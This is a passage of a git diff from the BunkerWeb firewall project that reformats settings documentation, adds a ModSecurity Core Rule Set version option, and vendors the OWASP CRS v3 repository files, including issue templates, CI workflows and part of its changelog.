disable caching of the proxied resources. | +| `PROXY_CACHE_PATH_LEVELS` | `1:2` | global | no | Hierarchy levels of the cache. | +| `PROXY_CACHE_PATH_ZONE_SIZE` | `10m` | global | no | Maximum size of cached metadata when caching proxied resources. | +| `PROXY_CACHE_PATH_PARAMS` | `max_size=100m` | global | no | Additional parameters to add to the proxy_cache directive. | +| `PROXY_CACHE_METHODS` | `GET HEAD` | multisite | no | HTTP methods that should trigger a cache operation. | +| `PROXY_CACHE_MIN_USES` | `2` | multisite | no | The minimum number of requests before a response is cached. | +| `PROXY_CACHE_KEY` | `$scheme$host$request_uri` | multisite | no | The key used to uniquely identify a cached response. | +| `PROXY_CACHE_VALID` | `200=24h 301=1h 302=24h` | multisite | no | Define the caching time depending on the HTTP status code (list of status=time), separated with spaces. | +| `PROXY_NO_CACHE` | `$http_pragma $http_authorization` | multisite | no | Conditions to disable caching of responses. | +| `PROXY_CACHE_BYPASS` | `0` | multisite | no | Conditions to bypass caching of responses. | +| `REVERSE_PROXY_CONNECT_TIMEOUT` | `60s` | multisite | yes | Timeout when connecting to the proxied resource. | +| `REVERSE_PROXY_READ_TIMEOUT` | `60s` | multisite | yes | Timeout when reading from the proxied resource. | +| `REVERSE_PROXY_SEND_TIMEOUT` | `60s` | multisite | yes | Timeout when sending to the proxied resource. | +| `REVERSE_PROXY_INCLUDES` | | multisite | yes | Additional configuration to include in the location block, separated with spaces. | ### Reverse scan @@ -485,11 +501,11 @@ STREAM support :white_check_mark: Scan clients ports to detect proxies or servers. -| Setting | Default | Context |Multiple| Description | -|----------------------|--------------------------|---------|--------|------------------------------------------------------------------| -|`USE_REVERSE_SCAN` |`no` |multisite|no |Enable scanning of clients ports and deny access if one is opened.| -|`REVERSE_SCAN_PORTS` |`22 80 443 3128 8000 8080`|multisite|no |List of port to scan when using reverse scan feature. | -|`REVERSE_SCAN_TIMEOUT`|`500` |multisite|no |Specify the maximum timeout (in ms) when scanning a port. | +| Setting | Default | Context | Multiple | Description | +| ---------------------- | -------------------------- | --------- | -------- | ------------------------------------------------------------------ | +| `USE_REVERSE_SCAN` | `no` | multisite | no | Enable scanning of clients ports and deny access if one is opened. | +| `REVERSE_SCAN_PORTS` | `22 80 443 3128 8000 8080` | multisite | no | List of port to scan when using reverse scan feature. | +| `REVERSE_SCAN_TIMEOUT` | `500` | multisite | no | Specify the maximum timeout (in ms) when scanning a port. | ### Self-signed certificate @@ -497,11 +513,11 @@ STREAM support :white_check_mark: Generate self-signed certificate. -| Setting | Default | Context |Multiple| Description | -|--------------------------|----------------------|---------|--------|-----------------------------------------| -|`GENERATE_SELF_SIGNED_SSL`|`no` |multisite|no |Generate and use self-signed certificate.| -|`SELF_SIGNED_SSL_EXPIRY` |`365` |multisite|no |Self-signed certificate expiry in days. | -|`SELF_SIGNED_SSL_SUBJ` |`/CN=www.example.com/`|multisite|no |Self-signed certificate subject. | +| Setting | Default | Context | Multiple | Description | +| -------------------------- | ---------------------- | --------- | -------- | ----------------------------------------- | +| `GENERATE_SELF_SIGNED_SSL` | `no` | multisite | no | Generate and use self-signed certificate. | +| `SELF_SIGNED_SSL_EXPIRY` | `365` | multisite | no | Self-signed certificate expiry in days. | +| `SELF_SIGNED_SSL_SUBJ` | `/CN=www.example.com/` | multisite | no | Self-signed certificate subject. | ### Sessions @@ -509,15 +525,15 @@ STREAM support :white_check_mark: Management of session used by other plugins. -| Setting |Default |Context|Multiple| Description | -|---------------------------|--------|-------|--------|---------------------------------------------------------------------------------| -|`SESSIONS_SECRET` |`random`|global |no |Secret used to encrypt sessions variables for storing data related to challenges.| -|`SESSIONS_NAME` |`random`|global |no |Name of the cookie given to clients. | -|`SESSIONS_IDLING_TIMEOUT` |`1800` |global |no |Maximum time (in seconds) of inactivity before the session is invalidated. | -|`SESSIONS_ROLLING_TIMEOUT` |`3600` |global |no |Maximum time (in seconds) before a session must be renewed. | -|`SESSIONS_ABSOLUTE_TIMEOUT`|`86400` |global |no |Maximum time (in seconds) before a session is destroyed. | -|`SESSIONS_CHECK_IP` |`yes` |global |no |Destroy session if IP address is different than original one. | -|`SESSIONS_CHECK_USER_AGENT`|`yes` |global |no |Destroy session if User-Agent is different than original one. | +| Setting | Default | Context | Multiple | Description | +| --------------------------- | -------- | ------- | -------- | --------------------------------------------------------------------------------- | +| `SESSIONS_SECRET` | `random` | global | no | Secret used to encrypt sessions variables for storing data related to challenges. | +| `SESSIONS_NAME` | `random` | global | no | Name of the cookie given to clients. | +| `SESSIONS_IDLING_TIMEOUT` | `1800` | global | no | Maximum time (in seconds) of inactivity before the session is invalidated. | +| `SESSIONS_ROLLING_TIMEOUT` | `3600` | global | no | Maximum time (in seconds) before a session must be renewed. | +| `SESSIONS_ABSOLUTE_TIMEOUT` | `86400` | global | no | Maximum time (in seconds) before a session is destroyed. | +| `SESSIONS_CHECK_IP` | `yes` | global | no | Destroy session if IP address is different than original one. | +| `SESSIONS_CHECK_USER_AGENT` | `yes` | global | no | Destroy session if User-Agent is different than original one. | ### UI @@ -525,10 +541,10 @@ STREAM support :x: Integrate easily the BunkerWeb UI. -| Setting |Default| Context |Multiple| Description | -|---------|-------|---------|--------|--------------------------------------------| -|`USE_UI` |`no` |multisite|no |Use UI | -|`UI_HOST`| |global |no |Address of the web UI used for initial setup| +| Setting | Default | Context | Multiple | Description | +| --------- | ------- | --------- | -------- | -------------------------------------------- | +| `USE_UI` | `no` | multisite | no | Use UI | +| `UI_HOST` | | global | no | Address of the web UI used for initial setup | ### Whitelist @@ -536,17 +552,17 @@ STREAM support :warning: Allow access based on internal and external IP/network/rDNS/ASN whitelists. -| Setting | Default | Context |Multiple| Description | -|---------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------|--------|----------------------------------------------------------------------------------| -|`USE_WHITELIST` |`yes` |multisite|no |Activate whitelist feature. | -|`WHITELIST_IP` |`20.191.45.212 40.88.21.235 40.76.173.151 40.76.163.7 20.185.79.47 52.142.26.175 20.185.79.15 52.142.24.149 40.76.162.208 40.76.163.23 40.76.162.191 40.76.162.247` |multisite|no |List of IP/network, separated with spaces, to put into the whitelist. | -|`WHITELIST_IP_URLS` | |global |no |List of URLs, separated with spaces, containing good IP/network to whitelist. | -|`WHITELIST_RDNS_GLOBAL` |`yes` |multisite|no |Only perform RDNS whitelist checks on global IP addresses. | -|`WHITELIST_RDNS` |`.google.com .googlebot.com .yandex.ru .yandex.net .yandex.com .search.msn.com .baidu.com .baidu.jp .crawl.yahoo.net .fwd.linkedin.com .twitter.com .twttr.com .discord.com`|multisite|no |List of reverse DNS suffixes, separated with spaces, to whitelist. | -|`WHITELIST_RDNS_URLS` | |global |no |List of URLs, separated with spaces, containing reverse DNS suffixes to whitelist.| -|`WHITELIST_ASN` |`32934` |multisite|no |List of ASN numbers, separated with spaces, to whitelist. | -|`WHITELIST_ASN_URLS` | |global |no |List of URLs, separated with spaces, containing ASN to whitelist. | -|`WHITELIST_USER_AGENT` | |multisite|no |List of User-Agent (PCRE regex), separated with spaces, to whitelist. | -|`WHITELIST_USER_AGENT_URLS`| |global |no |List of URLs, separated with spaces, containing good User-Agent to whitelist. | -|`WHITELIST_URI` | |multisite|no |List of URI (PCRE regex), separated with spaces, to whitelist. | -|`WHITELIST_URI_URLS` | |global |no |List of URLs, separated with spaces, containing bad URI to whitelist. | +| Setting | Default | Context | Multiple | Description | +| --------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------- | -------- | ---------------------------------------------------------------------------------- | +| `USE_WHITELIST` | `yes` | multisite | no | Activate whitelist feature. | +| `WHITELIST_IP` | `20.191.45.212 40.88.21.235 40.76.173.151 40.76.163.7 20.185.79.47 52.142.26.175 20.185.79.15 52.142.24.149 40.76.162.208 40.76.163.23 40.76.162.191 40.76.162.247` | multisite | no | List of IP/network, separated with spaces, to put into the whitelist. | +| `WHITELIST_IP_URLS` | | global | no | List of URLs, separated with spaces, containing good IP/network to whitelist. | +| `WHITELIST_RDNS_GLOBAL` | `yes` | multisite | no | Only perform RDNS whitelist checks on global IP addresses. | +| `WHITELIST_RDNS` | `.google.com .googlebot.com .yandex.ru .yandex.net .yandex.com .search.msn.com .baidu.com .baidu.jp .crawl.yahoo.net .fwd.linkedin.com .twitter.com .twttr.com .discord.com` | multisite | no | List of reverse DNS suffixes, separated with spaces, to whitelist. | +| `WHITELIST_RDNS_URLS` | | global | no | List of URLs, separated with spaces, containing reverse DNS suffixes to whitelist. | +| `WHITELIST_ASN` | `32934` | multisite | no | List of ASN numbers, separated with spaces, to whitelist. | +| `WHITELIST_ASN_URLS` | | global | no | List of URLs, separated with spaces, containing ASN to whitelist. | +| `WHITELIST_USER_AGENT` | | multisite | no | List of User-Agent (PCRE regex), separated with spaces, to whitelist. | +| `WHITELIST_USER_AGENT_URLS` | | global | no | List of URLs, separated with spaces, containing good User-Agent to whitelist. | +| `WHITELIST_URI` | | multisite | no | List of URI (PCRE regex), separated with spaces, to whitelist. | +| `WHITELIST_URI_URLS` | | global | no | List of URLs, separated with spaces, containing bad URI to whitelist. | diff --git a/src/bw/entrypoint.sh b/src/bw/entrypoint.sh index d00e3076f..3eab5b7c6 100644 --- a/src/bw/entrypoint.sh +++ b/src/bw/entrypoint.sh @@ -44,7 +44,7 @@ function trap_reload() { trap "trap_reload" HUP # generate "temp" config -echo -e "IS_LOADING=yes\nUSE_BUNKERNET=no\nSERVER_NAME=\nAPI_HTTP_PORT=${API_HTTP_PORT:-5000}\nAPI_SERVER_NAME=${API_SERVER_NAME:-bwapi}\nAPI_WHITELIST_IP=${API_WHITELIST_IP:-127.0.0.0/8}\nUSE_REAL_IP=${USE_REAL_IP:-no}\nUSE_PROXY_PROTOCOL=${USE_PROXY_PROTOCOL:-no}\nREAL_IP_FROM=${REAL_IP_FROM:-192.168.0.0/16 172.16.0.0/12 10.0.0.0/8}\nREAL_IP_HEADER=${REAL_IP_HEADER:-X-Forwarded-For}\nHTTP_PORT=${HTTP_PORT:-8080}\nHTTPS_PORT=${HTTPS_PORT:-8443}" > /tmp/variables.env +echo -e "IS_LOADING=yes\nUSE_BUNKERNET=no\nSEND_ANONYMOUS_REPORT=no\nSERVER_NAME=\nMODSECURITY_CRS_VERSION=${MODSECURITY_CRS_VERSION:-4}\nAPI_HTTP_PORT=${API_HTTP_PORT:-5000}\nAPI_SERVER_NAME=${API_SERVER_NAME:-bwapi}\nAPI_WHITELIST_IP=${API_WHITELIST_IP:-127.0.0.0/8}\nUSE_REAL_IP=${USE_REAL_IP:-no}\nUSE_PROXY_PROTOCOL=${USE_PROXY_PROTOCOL:-no}\nREAL_IP_FROM=${REAL_IP_FROM:-192.168.0.0/16 172.16.0.0/12 10.0.0.0/8}\nREAL_IP_HEADER=${REAL_IP_HEADER:-X-Forwarded-For}\nHTTP_PORT=${HTTP_PORT:-8080}\nHTTPS_PORT=${HTTPS_PORT:-8443}" > /tmp/variables.env python3 /usr/share/bunkerweb/gen/main.py --variables /tmp/variables.env # start nginx diff --git a/src/common/core/modsecurity/confs/server-http/modsecurity-rules.conf.modsec b/src/common/core/modsecurity/confs/server-http/modsecurity-rules.conf.modsec index 832f3e7d2..d9d8bc0c0 100644 --- a/src/common/core/modsecurity/confs/server-http/modsecurity-rules.conf.modsec +++ b/src/common/core/modsecurity/confs/server-http/modsecurity-rules.conf.modsec @@ -66,7 +66,7 @@ SecAuditLog /var/log/bunkerweb/modsec_audit.log # include OWASP CRS configurations {% if USE_MODSECURITY_CRS == "yes" %} -include /usr/share/bunkerweb/core/modsecurity/files/crs-setup.conf +include /usr/share/bunkerweb/core/modsecurity/files/crs-setup-v{{ MODSECURITY_CRS_VERSION }}.conf # custom CRS configurations before loading rules (e.g. exclusions) {% if is_custom_conf("/etc/bunkerweb/configs/modsec-crs") %} @@ -100,7 +100,7 @@ SecRule ENV:is_whitelisted "yes" "id:1000,phase:1,allow,nolog,ctl:ruleEngine=Off {% endif +%} # include OWASP CRS rules -include /usr/share/bunkerweb/core/modsecurity/files/coreruleset/rules/*.conf +include /usr/share/bunkerweb/core/modsecurity/files/coreruleset-v{{ MODSECURITY_CRS_VERSION }}/rules/*.conf {% endif +%} # custom rules after loading the CRS diff --git a/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/01_false-positive.md b/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/01_false-positive.md new file mode 100644 index 000000000..eeb0b7a3e --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/01_false-positive.md @@ -0,0 +1,34 @@ +--- +name: 'False positive' +about: Report a false positive (incorrect blocking) +title: '' +labels: 'False Positive' +assignees: '' +--- + +### Description + + + + + +### Audit Logs / Triggered Rule Numbers + + + + +### Your Environment + + + + +* CRS version (e.g., v3.2.0): +* Paranoia level setting: +* ModSecurity version (e.g., 2.9.3): +* Web Server and version (e.g., apache 2.4.41): +* Operating System and version: + +### Confirmation + +[ ] I have removed any personal data (email addresses, IP addresses, + passwords, domain names) from any logs posted. diff --git a/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/02_false-negative.md b/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/02_false-negative.md new file mode 100644 index 000000000..75b0e3544 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/02_false-negative.md @@ -0,0 +1,33 @@ +--- +name: 'False negative' +about: Report a false negative (incorrect bypass) +title: '' +labels: 'False Negative - Evasion' +assignees: '' +--- + +### Description + + + + + + + + + +### Your Environment + + + + +* CRS version (e.g., v3.2.0): +* Paranoia level setting: +* ModSecurity version (e.g., 2.9.3): +* Web Server and version (e.g., apache 2.4.41): +* Operating System and version: + +### Confirmation + +[ ] I have removed any personal data (email addresses, IP addresses, + passwords, domain names) from any logs posted. diff --git a/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/03_bug-report.md b/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/03_bug-report.md new file mode 100644 index 000000000..bc130f67f --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/03_bug-report.md @@ -0,0 +1,39 @@ +--- +name: '🐞 Bug report' +about: Create a report to help us improve +title: '' +labels: 'Bug' +assignees: '' +--- + +### Describe the bug + + + +### Steps to reproduce + + + +### Expected behaviour + + + +### Actual behaviour + + + + +### Additional context + + + +### Your Environment + + + + +* CRS version (e.g., v3.2.0): +* Paranoia level setting: +* ModSecurity version (e.g., 2.9.3): +* Web Server and version (e.g., apache 2.4.41): +* Operating System and version: diff --git a/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/04_feature.md b/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/04_feature.md new file mode 100644 index 000000000..b2e82b611 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/04_feature.md @@ -0,0 +1,28 @@ +--- +name: '🚀 Feature request' +about: Suggest an idea for this project +title: '' +labels: 'Feature Request' +assignees: '' +--- + +### Motivation + + + + +### Proposed solution + + + + +### Alternatives + + + + + +### Additional context + + + diff --git a/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/config.yml b/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/config.yml new file mode 100644 index 000000000..4c1d7af74 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/.github/ISSUE_TEMPLATE/config.yml @@ -0,0 +1,8 @@ +blank_issues_enabled: false +contact_links: + - name: Help and support + url: https://security.stackexchange.com/questions/tagged/owasp-crs + about: For help and support please go here. + - name: OWASP Core Rule Set mailing list + url: https://groups.google.com/a/owasp.org/forum/#!forum/modsecurity-core-rule-set-project + about: Ask general usage questions and participate in discussions on the CRS. diff --git a/src/common/core/modsecurity/files/coreruleset-v3/.github/workflows/lint.yaml b/src/common/core/modsecurity/files/coreruleset-v3/.github/workflows/lint.yaml new file mode 100644 index 000000000..839317240 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/.github/workflows/lint.yaml @@ -0,0 +1,37 @@ +--- +name: Lint + +on: [push, pull_request] + +jobs: + check-syntax: + runs-on: ubuntu-latest + strategy: + fail-fast: true + # check why is failing and change afterwards + steps: + - name: Checkout repo + uses: actions/checkout@v2 + + - name: Lint Yaml + uses: ibiqlik/action-yamllint@v3 + with: + format: github + file_or_dir: tests/regression/tests + config_file: .yamllint.yml + + - name: Linelint + uses: fernandrone/linelint@master + id: linelint + + - name: Set up Python 3 + uses: actions/setup-python@v2 + with: + python-version: 3.7 + + - name: "Check CRS syntax" + run: | + pip install --upgrade setuptools + pip install secrules-parsing + secrules-parser -c --output-type github -f rules/*.conf + diff --git a/src/common/core/modsecurity/files/coreruleset-v3/.github/workflows/stale.yml b/src/common/core/modsecurity/files/coreruleset-v3/.github/workflows/stale.yml new file mode 100644 index 000000000..f3e129c8b --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/.github/workflows/stale.yml @@ -0,0 +1,19 @@ +name: Mark stale issues + +on: + schedule: + - cron: "0 0 * * *" + +jobs: + stale: + + runs-on: ubuntu-latest + + steps: + - uses: actions/stale@v1 + with: + repo-token: ${{ secrets.GITHUB_TOKEN }} + stale-issue-message: 'This issue has been open 120 days with no activity. Remove the stale label or comment, or this will be closed in 14 days' + stale-issue-label: 'Stale issue' + days-before-stale: 120 + days-before-close: 14 diff --git a/src/common/core/modsecurity/files/coreruleset-v3/.github/workflows/test.yml b/src/common/core/modsecurity/files/coreruleset-v3/.github/workflows/test.yml new file mode 100644 index 000000000..de86f4989 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/.github/workflows/test.yml @@ -0,0 +1,59 @@ +--- +name: Regression Tests + +on: + push: + paths: + - 'rules/**' + - 'tests/**' + - '.github/**' + pull_request: + paths: + - 'rules/**' + - 'tests/**' + - '.github/**' + +jobs: + regression: + runs-on: ubuntu-latest + strategy: + matrix: + modsec_version: [modsec2-apache] + steps: + - name: "Checkout repo" + uses: actions/checkout@v3 + + - name: "Install dependencies" + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + GO_FTW_VERSION: '0.4.6' + run: | + gh release download -R coreruleset/go-ftw v${GO_FTW_VERSION} -p "ftw_${GO_FTW_VERSION}_linux_amd64.tar.gz" -O - | tar -xzvf - ftw + + - name: "Run tests for ${{ matrix.modsec_version }}" + run: | + mkdir -p tests/logs/${{ matrix.modsec_version }}/{nginx,apache2} + docker-compose -f ./tests/docker-compose.yml up -d "${{ matrix.modsec_version }}" + docker-compose -f ./tests/docker-compose.yml logs + [ $(docker inspect ${{ matrix.modsec_version }} --format='{{.State.Running}}') = 'true' ] + ./ftw check -d tests/regression/tests + ./ftw run -d tests/regression/tests --show-failures-only + env: + FTW_LOGFILE: './tests/logs/modsec2-apache/error.log' + + - name: "Change permissions if failed" + if: failure() + run: | + # we want to get the audit log, so change permissions (file is only for root on docker) + sudo chmod 644 tests/logs/${{ matrix.modsec_version }}/modsec_audit.log + + - uses: actions/upload-artifact@v2 + if: failure() + with: + name: waf-logs + path: tests/logs/${{ matrix.modsec_version }} + + - name: Clean docker-compose + run: | + docker-compose -f ./tests/docker-compose.yml stop "${{ matrix.modsec_version }}" + docker-compose -f ./tests/docker-compose.yml down diff --git a/src/common/core/modsecurity/files/coreruleset-v3/.gitignore b/src/common/core/modsecurity/files/coreruleset-v3/.gitignore new file mode 100644 index 000000000..a8f9bac6b --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/.gitignore @@ -0,0 +1,21 @@ +*.swp +*.swo + +# User configuration +crs-setup.conf +rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf +rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf + +# The MaxMind GeoIP database can be downloaded or upgraded by running: +# util/upgrade.py geoip +util/geo-location/GeoIP.dat + +# Unit test caches +.cache + +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[cod] +*$py.class + +.idea/ diff --git a/src/common/core/modsecurity/files/coreruleset-v3/.gitmodules b/src/common/core/modsecurity/files/coreruleset-v3/.gitmodules new file mode 100644 index 000000000..592118760 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/.gitmodules @@ -0,0 +1,4 @@ +[submodule "docs/OWASP-CRS-Documentation"] + path = docs/OWASP-CRS-Documentation + url = https://github.com/SpiderLabs/OWASP-CRS-Documentation + branch = master diff --git a/src/common/core/modsecurity/files/coreruleset-v3/.linelint.yml b/src/common/core/modsecurity/files/coreruleset-v3/.linelint.yml new file mode 100644 index 000000000..12e7c88e6 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/.linelint.yml @@ -0,0 +1,12 @@ +rules: + # checks if file ends in a newline character + end-of-file: + # set to true to enable this rule + enable: true + + # set to true to disable autofix (if enabled globally) + disable-autofix: true + + # will be ignored only by this rule + ignore: + - .pytest_cache/* diff --git a/src/common/core/modsecurity/files/coreruleset-v3/.travis.yml b/src/common/core/modsecurity/files/coreruleset-v3/.travis.yml new file mode 100644 index 000000000..96765998f --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/.travis.yml @@ -0,0 +1,31 @@ +os: linux +language: python +python: + - 2.7 + +# no more required in travis +#sudo: required + +services: + - docker + +jobs: + include: + script: + - | + if [[ "$TRAVIS_PULL_REQUEST" != "false" ]]; then + docker run -ti --name crs-test --entrypoint /docker-entrypoint.sh -e REPO=$TRAVIS_PULL_REQUEST_SLUG -e BRANCH=$TRAVIS_PULL_REQUEST_BRANCH themiddle/crs-test + else + docker run -ti --name crs-test --entrypoint /docker-entrypoint.sh -e REPO=$TRAVIS_REPO_SLUG -e BRANCH=$TRAVIS_BRANCH themiddle/crs-test + fi + +# safelist +branches: + only: + - v3.1/dev + - v3.2/dev + - v3.3/dev + - fix-travis + +#notifications: +# irc: "chat.freenode.net#modsecurity" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/.yamllint.yml b/src/common/core/modsecurity/files/coreruleset-v3/.yamllint.yml new file mode 100644 index 000000000..c07e5911d --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/.yamllint.yml @@ -0,0 +1,20 @@ +extends: default + +rules: + # Test lines can be big + line-length: + max: 1024 + level: warning + # These files below have very large lines, needed for the test. + # So they will raise warnings every time. + ignore: | + tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml + tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920390.yaml + tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml + + # don't bother me with this rule + indentation: disable + + comments: + require-starting-space: true # default + min-spaces-from-content: 1 diff --git a/src/common/core/modsecurity/files/coreruleset-v3/CHANGES.md b/src/common/core/modsecurity/files/coreruleset-v3/CHANGES.md new file mode 100644 index 000000000..444e4f71f --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/CHANGES.md @@ -0,0 +1,1499 @@ +# OWASP ModSecurity Core Rule Set (CRS) CHANGES + +## Report Bugs/Issues to GitHub Issues Tracker or the mailinglist + +* + or the CRS Google Group at +* + +## Version 3.3.5 - 2023-07-18 + +Important changes: + +* Backport fix for CVE-2023-38199 from CRS v4 via new rule 920620 (Andrea Menin, Felipe Zipitría) + +Fixes: + +* Fix paranoia level-related scoring issue in rule 921422 (Walter Hop) +* Move auditLogParts actions to the end of chained rules where used (Ervin Hegedus) + +Chore: + +* Clean up redundant paranoia level tags (Ervin Hegedus) +* Clean up YAML test files to support go-ftw testing framework (Felipe Zipitría) +* Move testing framework from ftw to go-ftw (Felipe Zipitría) + +## Version 3.3.4 - 2022-09-20 + +Fixes and improvements: + +* Fix a regression in our former release, with the impact that some Paranoia Level 2 rules would activate even when running in Paranoia Level 1. (Simon Studer, Walter Hop) + +## Version 3.3.3 - 2022-09-19 + +Important changes: + +* This update requires ModSecurity version 2.9.6 or 3.0.8 (or an updated version with backports of the security fixes in these versions) or a compatible engine supporting these changes. If you do not upgrade ModSecurity, the file REQUEST-922-MULTIPART-ATTACK.conf will cause ModSecurity to fail to start. In that case, you can temporarily delete that file. However, you will be missing protection from these rules. Therefore, we recommend upgrading your ModSecurity or other engine instead. +* By default, the request headers "Accept-Charset" and "Content-Encoding" are now blocked to prevent a WAF bypass. Especially the "Accept-Charset" header may be in use by clients. If you need to serve clients that send this header, uncomment and edit rule 900250 in crs-setup.conf. + +Fixes and improvements: + +* Fix CVE-2022-39955 Multiple charsets defined in Content-Type header (Jan Gora) +* Fix CVE-2022-39956 Content-Type or Content-Transfer-Encoding MIME header fields abuse (Jan Gora, Felipe Zipitria) +* Fix CVE-2022-39957 Charset accept header field resulting in response rule set bypass (Karel Knibbe, Max Leske) +* Fix CVE-2022-39958 Small range header leading to response rule set bypass (Hussein Daher, Christian Folini) +* Fix MIME header abuse via _charset_ field (Jan Gora, Felipe Zipitria) +* Fix bypass using deflated request body (Karel Knibbe) +* Fix request body partial rule set bypass via Content-Type "text/plain" (Pinaki Mondal, Andrea Menin) +* Fix XML Body Parser abuse for non-XML request bodies (Jan Gora) +* Fix body processor bypass by content-type outside the mime type declaration (Jan Gora, Simon Studer, Ervin Hegedus) + +## Version 3.3.2 - 2021-06-30 + +Fixes and improvements: + +* Fix CVE-2021-35368 WAF bypass using pathinfo (Christian Folini) + +## Version 3.3.0 - 2020-07-01 + +Important changes: + +* The format of crs-setup.conf variable "tx.allowed_request_content_type" has been changed to be more in line with the other variables. If you have overridden this variable, please see the example in crs-setup.conf for the new separator to use. + +New functionality: + +* Block backup files ending with ~ in filename (Andrea Menin) +* Detect ffuf vuln scanner (Will Woodson) +* Detect Nuclei vuln scanner (azurit) +* Detect SemrushBot crawler (Christian Folini) +* Detect WFuzz vuln scanner (azurit) +* New LDAP injection rule (Christian Folini) +* New HTTP Splitting rule (Andrea Menin) +* Add .swp to restricted extensions (Andrea Menin) +* Allow CloudEvents content types (Bobby Earl) +* Add CAPEC tags for attack classification (Fernando Outeda, Christian Folini) +* Detect Unix RCE bypass techniques via uninitialized variables, string concatenations and globbing patterns (Andrea Menin) + +Removed functionality: + +* Removed outdated rule tags WASCTC, OWASP_TOP_10, OWASP_AppSensor/RE1, and OWASP_CRS/FOO/BAR; note that tags 'OWASP_CRS' and 'attack-type' are kept. (Christian Folini) + +Improved compatibility: + +* Changed variable to lowercase (modsec3 behavior fix) (Ervin Hegedus) + +Fixes and improvements: + +* WordPress: Add support for upload image/media in Gutenberg Editor (agusmu) +* Prevent bypass of rule 921110 (Amit Klein, Franziska Bühler) +* Prevent bypass of rule 921130 (Amit Klein, Franziska Bühler) +* fix CVE msg in rules 944120 944240 (Fernando Outeda) +* Remove broken or no longer used files (Federico G. Schwindt) +* Make content-type case insensitive (Franziska Bühler) +* Move /util/docker folder from v3.3/dev branch to dedicated repo (Peter Bittner) +* feat(lint): split actions in linting and regression (Felipe Zipitria) +* Fix FP in 921120 (Franziska Bühler) +* Add missing OWASP_CRS tags (Christian Folini) +* Fix GHA badges (Federico G. Schwindt) +* feat(badge): add apache license badge +* fix typos found by fossies codespell (Tim Herren) +* Decrease processing time of rules (Ervin Hegedüs) +* handle multiple directives in 920510 (Andrea Menin) +* handle multiple directives in 920510 (Andrea Menin) +* fix(ci): use log_contains instead (Felipe Zipitria) +* Move test where it belongs (Federico G. Schwindt) +* fix(ci): use docker in DetectionOnly (Felipe Zipitria) +* fix(rule): remove dangling whitespace (Felipe Zipitria) +* fix(ci): run actions on .github change (Felipe Zipitria) +* fix(docs): update badges and links in readme (Felipe Zipitria) +* README: update repo link (Walter Hop) +* Update README: Copyright 2019 -> 2020 (Christian Folini) +* fix(ci): run tests also on PRs (Felipe Zipitria) +* fix(ci): change test name and fix default params (Felipe Zipitria) +* Restore Travis Status (was in the wrong repo) (Christian Folini) +* Remove outdated Travis status after migration (Christian Folini) +* feat(ci): adds github actions testing (Felipe Zipitria) +* fix(migration): post migration tasks (Felipe Zipitria) +* feat(templates): add text to gihub templates about migration. To be reverted after migation is done. (Felipe Zipitria) +* Added more explanations to comment of 920300 (Christian Folini) +* Added 'ver' action with current version to all necessary rules (Ervin Hegedus) +* Update nextcloud excl rules and shorten var (Franziska Bühler) +* Change to preferred lowercase var (Franziska Bühler) +* Set var to lowercase and change comment (Franziska Bühler) +* Resolve issue with allowed_request_content_types (Franziska Bühler) +* Allow REPORT requests without Content-Type header in Nextcloud (pyllyukko) +* Suppress rule 200002 when editing contacts in Nextcloud (pyllyukko) +* XenForo: update exclusions (Walter Hop) +* WordPress: exclude additional URL fields in profile editor (Walter Hop) +* add www to link (NullIsNot0) +* Fix link for 941310 Old link does not work anymore. Change it to new one. (NullIsNot0) +* Add Content-Type: multipart/related as allowed default (jeremyjpj0916) +* Resolve issue 1722 and fix content-type whitelisting (Franziska Bühler) +* make severities and scores consistent (Walter Hop) +* add QQGameHall UA (#1731) (Andrea Menin) +* another test (Allan Boll) +* Add word boundaries around values in SQL tautologies (942130) (Allan Boll) +* Move tests to their own file, while here also correct permissions for 920180. (Federico G. Schwindt) +* Rule to check if both C-L and T-E are present (#1310) (Federico G. Schwindt) +* Fixes for 2 tests in 921200 (Christian Folini) +* XenForo: add exclusions, remove unnecessary chains (#1673) (Walter Hop) +* Fix FPs for 942350 (#1706) (Franziska Bühler) +* Fix typos found by codespell / Fossies project (#1702) (Simon Studer) +* Ignore check of CT header in POST request if protocol is HTTP/2 (Ervin Hegedus) +* Narrowing down the subpattern .*? in 941130 (Christian Folini) +* Restricting a wide regex a bit (Christian Folini) +* 